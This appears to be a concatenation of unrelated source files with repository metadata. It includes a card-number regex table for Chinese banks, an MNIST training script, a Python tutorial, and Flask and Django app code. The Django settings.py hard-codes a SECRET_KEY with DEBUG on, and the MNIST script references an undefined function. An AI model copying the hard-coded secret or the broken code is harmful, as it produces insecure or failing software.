r"/^(622906|628386|625519|625506)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "江西省农村信用社联合社", "bankCode": "JXNCX", "patterns": [ { "reg": r"/^(621592)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(628392)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "商丘市商业银行", "bankCode": "SCBBANK", "patterns": [ { "reg": r"/^(621748)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(628271)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "华融湘江银行", "bankCode": "HRXJB", "patterns": [ { "reg": r"/^(621366|621388)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(628328)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "衡水市商业银行", "bankCode": "HSBK", "patterns": [ { "reg": r"/^(621239|623068)\d{13}$/g", "cardType": "DC" } ] }, { "bankName": "重庆南川石银村镇银行", "bankCode": "CQNCSYCZ", "patterns": [ { "reg": r"/^(621653004)\d{10}$/g", "cardType": "DC" } ] }, { "bankName": "湖南省农村信用社联合社", "bankCode": "HNRCC", "patterns": [ { "reg": r"/^(622169|621519|621539|623090)\d{13}$/g", "cardType": "DC" } ] }, { "bankName": "邢台银行", "bankCode": "XTB", "patterns": [ { "reg": r"/^(621238|620528)\d{13}$/g", "cardType": "DC" } ] }, { "bankName": "临汾市尧都区农村信用合作联社", "bankCode": "LPRDNCXYS", "patterns": [ { "reg": r"/^(628382|625158)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "东营银行", "bankCode": "DYCCB", "patterns": [ { "reg": r"/^(621004)\d{12}$/g", "cardType": "DC" }, { "reg": r"/^(628217)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "上饶银行", "bankCode": "SRBANK", "patterns": [ { "reg": r"/^(621416)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(628217)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "德州银行", "bankCode": "DZBANK", "patterns": [ { "reg": r"/^(622937)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(628397)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "承德银行", "bankCode": "CDB", "patterns": [ { "reg": r"/^(628229)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "云南省农村信用社", "bankCode": "YNRCC", "patterns": [ { "reg": r"/^(622469|628307)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "柳州银行", "bankCode": "LZCCB", "patterns": [ { "reg": r"/^(622292|622291|621412)\d{12}$/g", "cardType": "DC" }, { "reg": r"/^(622880|622881)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(62829)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "威海市商业银行", "bankCode": "WHSYBANK", "patterns": [ { "reg": r"/^(623102)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(628234)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "湖州银行", "bankCode": "HZBANK", "patterns": [ { "reg": r"/^(628306)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "潍坊银行", "bankCode": "BANKWF", "patterns": [ { "reg": r"/^(622391|940072)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(628391)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "赣州银行", "bankCode": "GZB", "patterns": [ { "reg": r"/^(622967|940073)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(628233)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "日照银行", "bankCode": "RZGWYBANK", "patterns": [ { "reg": r"/^(628257)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "南昌银行", "bankCode": "NCB", "patterns": [ { "reg": r"/^(621269|622275)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(940006)\d{11}$/g", "cardType": "DC" }, { "reg": r"/^(628305)\d{11}$/g", "cardType": "CC" } ] }, { "bankName": "贵阳银行", "bankCode": "GYCB", "patterns": [ { "reg": r"/^(622133|621735)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(888)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(628213)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "锦州银行", "bankCode": "BOJZ", "patterns": [ { "reg": r"/^(622990|940003)\d{11}$/g", "cardType": "DC" }, { "reg": r"/^(628261)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "齐商银行", "bankCode": "QSBANK", "patterns": [ { "reg": r"/^(622311|940057)\d{11}$/g", "cardType": "DC" }, { "reg": r"/^(628311)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "珠海华润银行", "bankCode": "RBOZ", "patterns": [ { "reg": r"/^(622363|940048)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(628270)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "葫芦岛市商业银行", "bankCode": "HLDCCB", "patterns": [ { "reg": r"/^(622398|940054)\d{10}$/g", "cardType": "DC" } ] }, { "bankName": "宜昌市商业银行", "bankCode": "HBC", "patterns": [ { "reg": r"/^(940055)\d{11}$/g", "cardType": "DC" }, { "reg": r"/^(622397)\d{11}$/g", "cardType": "CC" } ] }, { "bankName": "杭州银行", "bankCode": "HZCB", "patterns": [ { "reg": r"/^(603367|622878|623061)\d{12}$/g", "cardType": "DC" }, { "reg": r"/^(622397|622286|628236|625800)\d{11}$/g", "cardType": "CC" } ] }, { "bankName": "苏州市商业银行", "bankCode": "JSBANK", "patterns": [ { "reg": r"/^(603506)\d{13}$/g", "cardType": "DC" } ] }, { "bankName": "辽阳银行", "bankCode": "LYCB", "patterns": [ { "reg": r"/^(622399|940043)\d{11}$/g", "cardType": "DC" } ] }, { "bankName": "洛阳银行", "bankCode": "LYB", "patterns": [ { "reg": r"/^(622420|940041)\d{11}$/g", "cardType": "DC" } ] }, { "bankName": "焦作市商业银行", "bankCode": "JZCBANK", "patterns": [ { "reg": r"/^(622338)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(940032)\d{10}$/g", "cardType": "DC" } ] }, { "bankName": "镇江市商业银行", "bankCode": "ZJCCB", "patterns": [ { "reg": r"/^(622394|940025)\d{10}$/g", "cardType": "DC" } ] }, { "bankName": "法国兴业银行", "bankCode": "FGXYBANK", "patterns": [ { "reg": r"/^(621245)\d{10}$/g", "cardType": "DC" } ] }, { "bankName": "大华银行", "bankCode": "DYBANK", "patterns": [ { "reg": r"/^(621328)\d{13}$/g", "cardType": "DC" } ] }, { "bankName": "企业银行", "bankCode": "DIYEBANK", "patterns": [ { "reg": r"/^(621651)\d{13}$/g", "cardType": "DC" } ] }, { "bankName": "华侨银行", "bankCode": "HQBANK", "patterns": [ { "reg": r"/^(621077)\d{10}$/g", "cardType": "DC" } ] }, { "bankName": "恒生银行", "bankCode": "HSB", "patterns": [ { "reg": r"/^(622409|621441)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(622410|621440)\d{11}$/g", "cardType": "DC" }, { "reg": r"/^(622950|622951)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(625026|625024|622376|622378|622377|625092)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "临沂商业银行", "bankCode": "LSB", "patterns": [ { "reg": r"/^(622359|940066)\d{13}$/g", "cardType": "DC" } ] }, { "bankName": "烟台商业银行", "bankCode": "YTCB", "patterns": [ { "reg": r"/^(622886)\d{10}$/g", "cardType": "DC" } ] }, { "bankName": "齐鲁银行", "bankCode": "QLB", "patterns": [ { "reg": r"/^(940008|622379)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(628379)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "BC卡公司", "bankCode": "BCCC", "patterns": [ { "reg": r"/^(620011|620027|620031|620039|620103|620106|620120|620123|620125|620220|620278|620812|621006|621011|621012|621020|621023|621025|621027|621031|620132|621039|621078|621220|621003)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(625003|625011|625012|625020|625023|625025|625027|625031|621032|625039|625078|625079|625103|625106|625006|625112|625120|625123|625125|625127|625131|625032|625139|625178|625179|625220|625320|625111|625132|625244)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "集友银行", "bankCode": "CYB", "patterns": [ { "reg": r"/^(622355|623042)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(621043|621742)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(622352|622353|625048|625053|625060)\d{10}$/g", "cardType": "CC" }, { "reg": r"/^(620206|620207)\d{10}$/g", "cardType": "PC" } ] }, { "bankName": "大丰银行", "bankCode": "TFB", "patterns": [ { "reg": r"/^(622547|622548|622546)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(625198|625196|625147)\d{10}$/g", "cardType": "CC" }, { "reg": r"/^(620072)\d{13}$/g", "cardType": "PC" }, { "reg": r"/^(620204|620205)\d{10}$/g", "cardType": "PC" } ] }, { "bankName": "AEON信贷财务亚洲有限公司", "bankCode": "AEON", "patterns": [ { "reg": r"/^(621064|622941|622974)\d{10}$/g", "cardType": "DC" }, { "reg": r"/^(622493)\d{10}$/g", "cardType": "CC" } ] }, { "bankName": "澳门BDA", "bankCode": "MABDA", "patterns": [ { "reg": r"/^(621274|621324)\d{13}$/g", "cardType": "DC" } ] }, { "bankName": "浙江泰隆商业银行", "bankCode": "ZJTLCB", "patterns": [ { "reg": r"/^(622287)\d{10}$/g", "cardType": "CC" }, { "reg": r"/^(622717)\d{10}$/g", "cardType": "SCC" }, { "reg": r"/^(621480)\d{13}$/g", "cardType": "DC" }, { "reg": r"/^(622141)\d{10}$/g", "cardType": "DC" } ] } ] # bank code可能不是唯一的,只有少数 bank code重复,还是可以用字典 BANK_CONFIG_DICT = dict([(x['bankCode'], x) for x in BANK_CONFIG_LIST])
[ "aken.jin.33@gmail.com" ]
aken.jin.33@gmail.com
06ecc90d6f4e88b215eff06a9f8ca48a119641f8
844581a7a54cb9cf2bdb3073cd4953ba44f351e4
/tp2/tp2-deep_NN/miniNN.py
9e6044fe26d803aa6af95934a046d563663e3cf0
[]
no_license
amaltarghi/tp_deep_learning
f86a29db0d6f0af69c54e0743e0ddfae21ea57af
14d23f9af4071a77c82b9b2c25bb3b81c8aaeeb4
refs/heads/master
2020-06-15T00:58:21.803013
2017-01-27T13:59:00
2017-01-27T13:59:00
75,184,494
0
0
null
null
null
null
UTF-8
Python
false
false
3,989
py
""" MiniNN - Minimal Neural Network This code is a straigthforward and minimal implementation of a multi-layer neural network for training on MNIST dataset. It is mainly intended for educational and prototyping purpuses. """ __author__ = "Gaetan Marceau Caron (gaetan.marceau-caron@inria.fr)" __copyright__ = "Copyright (C) 2015 Gaetan Marceau Caron" __license__ = "CeCILL 2.1" __version__ = "1.0" import copy, math, time, sys import dataset_loader from nn_ops import * import matplotlib.pyplot as plt import matplotlib.pyplot as plt1 ############################# ### Preliminaries ############################# # Retrieve the arguments from the command-line args = parseArgs() # Fix the seed for the random generator np.random.seed(seed=0) ############################# ### Dataset Handling ############################# ### Load the dataset train_set, valid_set, test_set = dataset_loader.load_mnist() ### Define the dataset variables n_training = train_set[0].shape[0] n_feature = train_set[0].shape[1] n_label = np.max(train_set[1])+1 ############################# ### Neural Network parameters ############################# ### Activation function act_func_name = args.act_func ### Network Architecture nn_arch = np.array([n_feature] + args.arch + [n_label]) ### Create the neural network W,B,act_func,nb_params = initNetwork(nn_arch,act_func_name) ############################# ### Optimization parameters ############################# eta = args.eta batch_size = args.batch_size n_batch = int(math.ceil(float(n_training)/batch_size)) n_epoch = args.n_epoch ############################# ### Auxiliary variables ############################# cumul_time = 0. # Convert the labels to one-hot vector one_hot = np.zeros((n_label,n_training)) one_hot[train_set[1],np.arange(n_training)]=1. printDescription("Bprop", eta, nn_arch, act_func_name, batch_size, nb_params) print("epoch time(s) train_loss train_accuracy valid_loss valid_accuracy eta") ############################# ### Learning process ############################# g_i = [] g_train_loss=[] g_train_acc=[] g_valid_loss=[] g_valid_acc=[] for i in range(n_epoch): for j in range(n_batch): ### Mini-batch creation batch, one_hot_batch, mini_batch_size = getMiniBatch(j, batch_size, train_set, one_hot) prev_time = time.clock() ### Forward propagation Y,Yp = forward(act_func, W, B, batch,drop_func) ### Compute the softmax out = softmax(Y[-1]) ### Compute the gradient at the top layer derror = out-one_hot_batch ### Backpropagation gradB = backward(derror, W, Yp) ### Update the parameters W, B = update(eta, batch_size, W, B, gradB, Y) curr_time = time.clock() cumul_time += curr_time - prev_time ### Training accuracy train_loss, train_accuracy = computeLoss(W, B, train_set[0], train_set[1], act_func) ### Valid accuracy valid_loss, valid_accuracy = computeLoss(W, B, valid_set[0], valid_set[1], act_func) result_line = str(i) + " " + str(cumul_time) + " " + str(train_loss) + " " + str(train_accuracy) + " " + str(valid_loss) + " " + str(valid_accuracy) + " " + str(eta) g_i = np.append(g_i, i) g_train_loss = np.append(g_train_loss, train_loss) g_train_acc = np.append(g_train_acc, train_accuracy) g_valid_loss = np.append(g_valid_loss, valid_loss) g_valid_acc = np.append(g_valid_acc, valid_accuracy) print(result_line) sys.stdout.flush() # Force emptying the stdout buffer plt.plot(g_i,g_train_acc,label='train_acc') plt.plot(g_i,g_valid_acc,label='valid_acc') plt.xlabel("epoch") plt.ylabel("Classification acc sigmoide[128-128]") plt.ylim([0.,1.]) plt.legend(loc='best') plt.show() plt1.plot(g_i,g_train_loss,label='train_loss') plt1.plot(g_i,g_valid_loss,label='valid_loss') plt1.xlabel("epoch") plt1.ylabel("Classification sigmoid [128-128]") plt1.ylim([0.,3.]) plt1.legend(loc='best') plt1.show()
[ "targhiamal@gmail.com" ]
targhiamal@gmail.com
304598e5e382fad84021f4a95d5a395b957a4456
88b78eb8385f30b1ccfd7c57dedd6441305c7d12
/python_callable_func.py
1f56ce51576b7be5115cc9baf6491137e4247df5
[]
no_license
tvocoder/learning_python
cb9faddf45881b0cd9ac26c9e5df19df3a0de34b
401980c856900b625373a9c883957d6488b4f501
refs/heads/master
2022-12-05T09:26:06.581416
2020-08-26T18:55:06
2020-08-26T18:55:06
289,073,661
0
0
null
null
null
null
UTF-8
Python
false
false
2,317
py
print("---= Callables Operators =---") print("-- *(tuple packing) --") # Description: Packs the consecutive function positional arguments into a tuple. # Syntax: def function(*tuple): # -- tuple: A tuple object used for storing the passed in arguments. # All the arguments can be accessed within the function body the same way as with any other tuple. # Remarks: The tuple name *args is used by convention. # Example: def add(*args): total = 0 for arg in args: total += arg return total x = add(1, 2, 3) print(x) print("*************************") print("-- **(dictionary packing) --") # Definition: Packs the consecutive function keyword arguments into a dictionary. # Syntax: def function(**dict): # -- dict: A dictionary object used for storing the passed in arguments. # All the arguments can be accessed within the function body with the same way as with any other dictionary. # Remarks: The dict name **kwargs is used by convention. # Example: def example(**kwargs): return kwargs.keys() d = example(a = 1, b = 20, c = [10, 20, 30]) print(d) print("*************************") print("-- *(tuple unpacking) --") # Definition: Unpacks the contents of a tuple into the function call # Syntax: function(*iterable) # Remarks: # Example: def add(a, b): return a + b t = (2 ,3) print(add(*t)) print(add(*"AD")) print(add(*{1: 1, 2: 2})) print("*************************") print("-- **(dictionary unpacking) --") # Definition: Unpacks the contents of a dictionary into a function call # Syntax: function(**dict) # -- dict: The dictionary containing pairs of keyword arguments and their values. # Remarks: # Example: def add(a=0, b=0): return a + b d = {'a': 2, 'b': 3} print(add(**d)) print("*************************") print("-- @(decorator) --") # Definition: Returns a callable wrapped by another callable. # Syntax: @decorator # def function(): # decorator: A callable that takes another callable as an argument. # Remarks: # Decorator Syntax: def decorator(f): pass @decorator def function(): pass # Is equivalent to: def function(): pass function = decorator(function) # Example: print("*************************") print(" -- ()(call operator --") # Definition: # Syntax: # Remarks: # Example: print("*************************")
[ "42848470+tvocoder@users.noreply.github.com" ]
42848470+tvocoder@users.noreply.github.com
d3a121fca276e1c24ca96cb517a01a0a8faf1b75
633b695a03e789f6aa644c7bec7280367a9252a8
/samplepy/6-03_student_card.py
123c709227e82e443dfc704cb4af4d119033367a
[]
no_license
tnakaicode/PlotGallery
3d831d3245a4a51e87f48bd2053b5ef82cf66b87
5c01e5d6e2425dbd17593cb5ecc973982f491732
refs/heads/master
2023-08-16T22:54:38.416509
2023-08-03T04:23:21
2023-08-03T04:23:21
238,610,688
5
2
null
null
null
null
UTF-8
Python
false
false
263
py
class StudentCard: def __init__(self): print('初期化メソッド内の処理です') self.id = 0 self.name = '未定' a = StudentCard() b = StudentCard() print(f'a.id:{a.id}, a.name:{a.name}') print(f'b.id:{b.id}, b.name:{b.name}')
[ "tnakaicode@gmail.com" ]
tnakaicode@gmail.com
c82d7fe7d81d9549ba5139768d173c9cd11899a2
a99e86146150aae97cd36311c3a90d95c272125a
/config.py
d36f3783d1440ab2f467cb67b9645c96fa0176eb
[]
no_license
mutaihillary/userapp
017ac68124e72b559ddb5a1e81f60fd0006ffb30
0da93766967c37e7c203e995765321eecdd3ac7e
refs/heads/master
2021-01-19T01:05:43.369086
2016-08-19T05:45:40
2016-08-19T05:45:40
65,550,146
0
0
null
null
null
null
UTF-8
Python
false
false
363
py
from flask_sqlalchemy import SQLAlchemy from flask import Flask import os basedir = os.path.abspath(os.path.dirname(__file__)) app = Flask(__name__) app.config['SQLALCHEMY_DATABASE_URI'] ='sqlite:///' + os.path.join(basedir, 'userapp.db') app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True app.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True db = SQLAlchemy(app)
[ "mutaihillary@yahoo.com" ]
mutaihillary@yahoo.com
e00a10c2d6bec1ad12527286192b6905d5c165f9
9c3365a48820ed380de9f8a7a099aef22516b6fd
/general/views.py
27d471d67a69669f25647407f7f7f1b909df93f2
[]
no_license
leoscalco/gca
e09b3d9d8432d1c4491f9110acc33bcf2f90e5d8
7592b9fd10033039978578eaa9cf4aee8ece5920
refs/heads/master
2021-01-01T05:14:33.171180
2016-05-02T18:59:10
2016-05-02T18:59:10
57,908,501
0
0
null
null
null
null
UTF-8
Python
false
false
1,105
py
from django.shortcuts import render from django.http import HttpResponseRedirect from gestao.models import * from django.views import generic # Create your views here. def index(request): context = '' news = New.objects.all().order_by('-post_date')[:10] context = {'news':news} return render(request, 'general/index.html', context) def tips(request): context = '' return render(request, 'general/tips.html', context) class ListDoc(generic.ListView): template_name = "general/doc/list.html" context_object_name = 'docs' paginate_by = 24 def get_queryset(self): return Document.objects.all().order_by("-post_date") class ListClassified(generic.ListView): template_name = "general/class/list.html" context_object_name = 'classifieds' paginate_by = 20 def get_queryset(self): return Classified.objects.all().order_by("-id") class ListProduct(generic.ListView): template_name = "general/store/list.html" context_object_name = 'products' paginate_by = 20 def get_queryset(self): return Product.objects.all()
[ "leoscalco@MacBook-Pro-de-Leonardo.local" ]
leoscalco@MacBook-Pro-de-Leonardo.local
8449ce1d59f6ee07799731026b6624f845beb714
52a9feebc66938e5317a0b39cd2f316cc1a85d5e
/test2.py
2cb94b72fd266d13a53e590ad2f10c676c13be90
[]
no_license
williamwu1234567890/20170505
c3c323b4c83797e2a65cdca08ce8be584397cc93
9e07952bced70582424f8ba8b9034778be8ccb60
refs/heads/master
2021-01-20T10:21:11.530957
2017-06-28T04:47:30
2017-06-28T04:47:30
90,347,918
0
0
null
null
null
null
UTF-8
Python
false
false
33
py
b =10 c=2 c=b d=1000 #wwwwwwwwww
[ "wulei_xz@126.com" ]
wulei_xz@126.com
90a48b4d3d91f34e6401d52f81b2887165da1394
e4532eb380fd684e2a658442279239793c39ae5f
/sc2/helpers/__init__.py
d8ba937712567184137e877c5d8e764dd15a1a05
[]
no_license
deltaori0/NCF2020
6225e9b0e60c31111012e63888e25c79121c53ed
34d99c01c3bcc21b7983bcf7f46277f2ff9d8093
refs/heads/master
2023-04-07T07:24:22.547241
2021-01-31T14:49:46
2021-01-31T14:49:46
357,296,029
1
0
null
null
null
null
UTF-8
Python
false
false
360
py
from pathlib import Path from .control_group import ControlGroup def is_submodule(path): if path.is_file(): return path.suffix == ".py" and path.stem != "__init__" elif path.is_dir(): return (path / "__init__.py").exists() return False __all__ = [p.stem for p in Path(__file__).parent.iterdir() if is_submodule(p)]
[ "rex8312@gmail.com" ]
rex8312@gmail.com
5d7d5330db3ed066c882a1af3fa60bd932cb33d0
dcd030f0f8c49592a19deb903fa4afb9e370033b
/node_modules/grpc/build/config.gypi
977b759c71cfe812f2a87e6e6b5fae158514c220
[ "Apache-2.0" ]
permissive
IswaryaChoday/seafood-market
31e52ec55813df6303bcc8876f1ace519717788c
44cc756e6f62cd0551a1aafcf8f3c49a4752bf58
refs/heads/master
2022-12-08T13:46:07.356829
2020-09-04T15:38:56
2020-09-04T15:38:56
269,240,697
0
0
null
null
null
null
UTF-8
Python
false
false
6,132
gypi
# Do not edit. File was generated by node-gyp's "configure" step { "target_defaults": { "cflags": [], "default_configuration": "Release", "defines": [], "include_dirs": [], "libraries": [] }, "variables": { "asan": 0, "build_v8_with_gn": "false", "coverage": "false", "dcheck_always_on": 0, "debug_nghttp2": "false", "debug_node": "false", "enable_lto": "false", "enable_pgo_generate": "false", "enable_pgo_use": "false", "error_on_warn": "false", "force_dynamic_crt": 0, "host_arch": "x64", "icu_data_in": "../../deps/icu-tmp/icudt66l.dat", "icu_endianness": "l", "icu_gyp_path": "tools/icu/icu-generic.gyp", "icu_path": "deps/icu-small", "icu_small": "false", "icu_ver_major": "66", "is_debug": 0, "llvm_version": "0.0", "napi_build_version": "0", "node_byteorder": "little", "node_debug_lib": "false", "node_enable_d8": "false", "node_install_npm": "true", "node_module_version": 83, "node_no_browser_globals": "false", "node_prefix": "/usr/local", "node_release_urlbase": "https://nodejs.org/download/release/", "node_shared": "false", "node_shared_brotli": "false", "node_shared_cares": "false", "node_shared_http_parser": "false", "node_shared_libuv": "false", "node_shared_nghttp2": "false", "node_shared_openssl": "false", "node_shared_zlib": "false", "node_tag": "", "node_target_type": "executable", "node_use_bundled_v8": "true", "node_use_dtrace": "true", "node_use_etw": "false", "node_use_node_code_cache": "true", "node_use_node_snapshot": "true", "node_use_openssl": "true", "node_use_v8_platform": "true", "node_with_ltcg": "false", "node_without_node_options": "false", "openssl_fips": "", "openssl_is_fips": "false", "shlib_suffix": "83.dylib", "target_arch": "x64", "v8_enable_31bit_smis_on_64bit_arch": 0, "v8_enable_gdbjit": 0, "v8_enable_i18n_support": 1, "v8_enable_inspector": 1, "v8_enable_pointer_compression": 0, "v8_no_strict_aliasing": 1, "v8_optimized_debug": 1, "v8_promise_internal_field_count": 1, "v8_random_seed": 0, "v8_trace_maps": 0, "v8_use_siphash": 1, "want_separate_host_toolset": 0, "xcode_version": "11.0", "nodedir": "/Users/ishwaryabolla/Library/Caches/node-gyp/14.2.0", "standalone_static_library": 1, "fallback_to_build": "true", "library": "static_library", "module": "/Users/ishwaryabolla/Documents/catch-of-the-day/node_modules/grpc/src/node/extension_binary/node-v83-darwin-x64-unknown/grpc_node.node", "module_name": "grpc_node", "module_path": "/Users/ishwaryabolla/Documents/catch-of-the-day/node_modules/grpc/src/node/extension_binary/node-v83-darwin-x64-unknown", "napi_version": "6", "node_abi_napi": "napi", "node_napi_label": "node-v83", "save_dev": "", "legacy_bundling": "", "dry_run": "", "viewer": "man", "only": "", "commit_hooks": "true", "browser": "", "also": "", "sign_git_commit": "", "rollback": "true", "usage": "", "audit": "true", "globalignorefile": "/usr/local/etc/npmignore", "shell": "/bin/bash", "maxsockets": "50", "init_author_url": "", "shrinkwrap": "true", "parseable": "", "metrics_registry": "https://registry.npmjs.org/", "timing": "", "init_license": "ISC", "if_present": "", "sign_git_tag": "", "init_author_email": "", "cache_max": "Infinity", "preid": "", "long": "", "local_address": "", "git_tag_version": "true", "cert": "", "registry": "https://registry.npmjs.org/", "fetch_retries": "2", "versions": "", "message": "%s", "key": "", "globalconfig": "/usr/local/etc/npmrc", "prefer_online": "", "logs_max": "10", "always_auth": "", "global_style": "", "cache_lock_retries": "10", "update_notifier": "true", "heading": "npm", "audit_level": "low", "searchlimit": "20", "read_only": "", "offline": "", "fetch_retry_mintimeout": "10000", "json": "", "access": "", "allow_same_version": "", "https_proxy": "", "engine_strict": "", "description": "true", "userconfig": "/Users/ishwaryabolla/.npmrc", "init_module": "/Users/ishwaryabolla/.npm-init.js", "cidr": "", "user": "", "node_version": "14.2.0", "save": "true", "ignore_prepublish": "", "editor": "vi", "auth_type": "legacy", "tag": "latest", "script_shell": "", "progress": "true", "global": "", "before": "", "searchstaleness": "900", "optional": "true", "ham_it_up": "", "save_prod": "", "force": "", "bin_links": "true", "searchopts": "", "node_gyp": "/usr/local/lib/node_modules/npm/node_modules/node-gyp/bin/node-gyp.js", "depth": "Infinity", "sso_poll_frequency": "500", "rebuild_bundle": "true", "unicode": "true", "fetch_retry_maxtimeout": "60000", "tag_version_prefix": "v", "strict_ssl": "true", "sso_type": "oauth", "scripts_prepend_node_path": "warn-only", "save_prefix": "^", "ca": "", "save_exact": "", "group": "20", "fetch_retry_factor": "10", "dev": "", "version": "", "prefer_offline": "", "cache_lock_stale": "60000", "otp": "", "cache_min": "10", "searchexclude": "", "cache": "/Users/ishwaryabolla/.npm", "color": "true", "package_lock": "true", "package_lock_only": "", "fund": "true", "save_optional": "", "ignore_scripts": "", "user_agent": "npm/6.14.4 node/v14.2.0 darwin x64", "cache_lock_wait": "10000", "production": "", "send_metrics": "", "save_bundle": "", "umask": "0022", "node_options": "", "init_version": "1.0.0", "init_author_name": "", "git": "git", "scope": "", "unsafe_perm": "true", "tmp": "/var/folders/2r/nv47r1b55jjg08zz_w_8y3bm0000gn/T", "onload_script": "", "prefix": "/usr/local", "link": "", "format_package_lock": "true" } }
[ "ishwarya.bolla96@gmail.com" ]
ishwarya.bolla96@gmail.com
ceb7045f045495b1369a753a9c13c61dab7b9581
3a92716a96c0d33adff065223a0df10d2cbc2c7c
/Person/models.py
99e0dab0ec1144bd12b8324738cd33e4c469013d
[]
no_license
cjmcfaul/workorder
328d84df4a584d185f24719636f2df38ccd46523
7451b07faa641409bfb79e9c17034522354380f2
refs/heads/master
2021-06-17T18:20:37.820388
2017-06-01T15:07:06
2017-06-01T15:07:06
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,318
py
from __future__ import unicode_literals from django.db import models # Create your models here. class Vendor(models.Model): TYPE = ( ("E","Exterminator"), ("P","Plumber"), ("Z","Electrician"), ("G","General Contractor"), ("H","Handy Man"), ) name = models.CharField(max_length=200) email = models.CharField(max_length=200) phone = models.CharField(max_length=200) vendor_type = models.CharField( max_length=1, choices = TYPE, ) def __str__(self): return '{}'.format(self.name) class Tenant(models.Model): name = models.CharField(max_length=200) email = models.CharField(max_length=200) phone = models.CharField(max_length=200) unit = models.ForeignKey( 'Property.Unit', ) def __str__(self): return '{}'.format(self.name) class Staff(models.Model): name = models.CharField(max_length=200) email = models.CharField(max_length=200) phone = models.CharField(max_length=200) def __str__(self): return '{}'.format(self.name) class Owner(models.Model): name = models.CharField(max_length=200) email = models.CharField(max_length=200) phone = models.CharField(max_length=200) def __str__(self): return '{}'.format(self.name)
[ "colinjmcfaul@gmail.com" ]
colinjmcfaul@gmail.com
d074e2f1226b84ae304ef819bb530d14d42e76af
5818b16be6c69e9e77ac217fb1f61592b7e286a7
/alarm.py
c05b5dbf29f6b142868bec0b1711010871fc4cfd
[]
no_license
suvansinha/Date-and-time
77748a7a0b9f56616e2647e9b8cf0ce25929a634
33d18ba0115e05b17cdfcc51ec6eff9ab1e4dac5
refs/heads/main
2022-12-30T01:45:07.872898
2020-10-17T12:39:06
2020-10-17T12:39:06
301,742,522
2
0
null
null
null
null
UTF-8
Python
false
false
986
py
import os import datetime from playsound import playsound from AppKit import NSSound os. system('clear') alarmH = int(input("What hour do you want the alarm to ring? ")) alarmM = int(input("What minute do you want the alarm to ring? ")) amPm = str(input("am or pm? ")) os. system('clear') print("Waiting for alarm",alarmH,alarmM,amPm) if (amPm == "pm"): alarmH = alarmH + 12 while(1 == 1): if(alarmH == datetime.datetime.now().hour and alarmM == datetime.datetime.now().minute) : print("Time to wake up") playsound('/your/path/to/file/beep-07.mp3') playsound('/your/path/to/file/beep-07.mp3') playsound('/your/path/to/file/beep-07.mp3') playsound('/your/path/to/file/beep-07.mp3') playsound('/your/path/to/file/beep-07.mp3') playsound('/your/path/to/file/beep-07.mp3') playsound('/your/path/to/file/beep-07.mp3') playsound('/your/path/to/file/beep-07.mp3') break
[ "noreply@github.com" ]
suvansinha.noreply@github.com
071d7ad1727d8f2f9952cc1d3957de6fff8c3dba
502925e0f4e304364e3f955e91c882c315afcb00
/mysite/settings.py
404ea2a254d683ce9685266a8520619b6fa5e672
[]
no_license
JSPlike/OnePerson
e9b15f342c0fb120e109ff56b1981009ad0f725c
c7f12971c8356acefbbac5ae1de0314185229bbe
refs/heads/master
2021-07-21T20:06:16.643998
2017-10-31T05:00:14
2017-10-31T05:00:14
108,928,206
0
0
null
null
null
null
UTF-8
Python
false
false
3,215
py
""" Django settings for mysite project. Generated by 'django-admin startproject' using Django 1.11.1. For more information on this file, see https://docs.djangoproject.com/en/1.11/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.11/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '#p@3(58i@^zooxu#f$^)d5ns(+5i%e58rhl!1s@+lmv!qugrx7' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = ['localhost', '127.0.0.1', '::1', 'pythonanywhere.com'] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 